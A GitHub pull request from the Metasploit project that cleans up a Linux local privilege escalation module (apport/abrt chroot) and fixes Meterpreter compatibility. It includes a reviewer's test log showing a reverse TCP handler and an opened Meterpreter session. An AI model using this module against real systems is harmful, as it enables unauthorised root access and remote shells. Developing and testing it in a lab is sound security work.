Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cleanup apport_abrt_chroot_priv_esc #11761

Merged
merged 1 commit into from Apr 29, 2019

Conversation

Projects
None yet
3 participants
@bcoles
Copy link
Contributor

commented Apr 19, 2019

Updates the apport_abrt_chroot_priv_esc module to be more in-line with current Linux LPE modules through code style changes and using new libs.

Also fixes a few issues when using the module on Meterpreter sessions:

  • The module made use of cd, which won't work on Meterpreter sessions, causing hard linking to fail, causing the exploit to fail. Using cd also results in the exploit directory generated by the exploit to appear in the working directory, not the intended directory, resulting in the directory not being cleaned up after a failed exploitation attempt.
  • The module upgraded the session in a new process (sub-shell) prior to executing the payload. This implementation works for command shell sessions, but was unsafe for Meterpreter sessions, and would cause the exploit to fail.

Note, it should work on Ubuntu 14.04.1 out of the box; but if you're testing on Fedora 19/20/21, you'll likely need to reintroduce the vulnerability as per #9399 (comment) #9399 (comment) (although disabling SELinux should not be necessary) - unless you feel like attempting to cherry pick the appropriate packages.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

commented Apr 22, 2019

@msjenkins-r7 would you lie to me?

@wchen-r7 wchen-r7 self-assigned this Apr 26, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 29, 2019

Module works for me. I'll land this in a bit:

msf5 exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[*] Started reverse TCP handler on 172.16.249.1:4445 
[*] Writing '/tmp/.1KI5rW' (64812 bytes) ...
[*] Writing '/tmp/.LlwvX' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 172.16.249.135
[*] Meterpreter session 3 opened (172.16.249.1:4445 -> 172.16.249.135:58425) at 2019-04-29 13:51:36 -0500

meterpreter > 

@wchen-r7 wchen-r7 merged commit da9aba0 into rapid7:master Apr 29, 2019

2 of 3 checks passed

continuous-integration/travis-ci/pr The Travis CI build failed
Details
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

wchen-r7 added a commit that referenced this pull request Apr 29, 2019

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 29, 2019

Release Notes

This updates the apport_abrt_chroot_priv_esc module to be more in-line with current Linux LPE modules through code style changes and using new libs.

msjenkins-r7 added a commit that referenced this pull request Apr 29, 2019

@bcoles bcoles deleted the bcoles:apport_abrt_chroot_priv_esc branch Apr 29, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.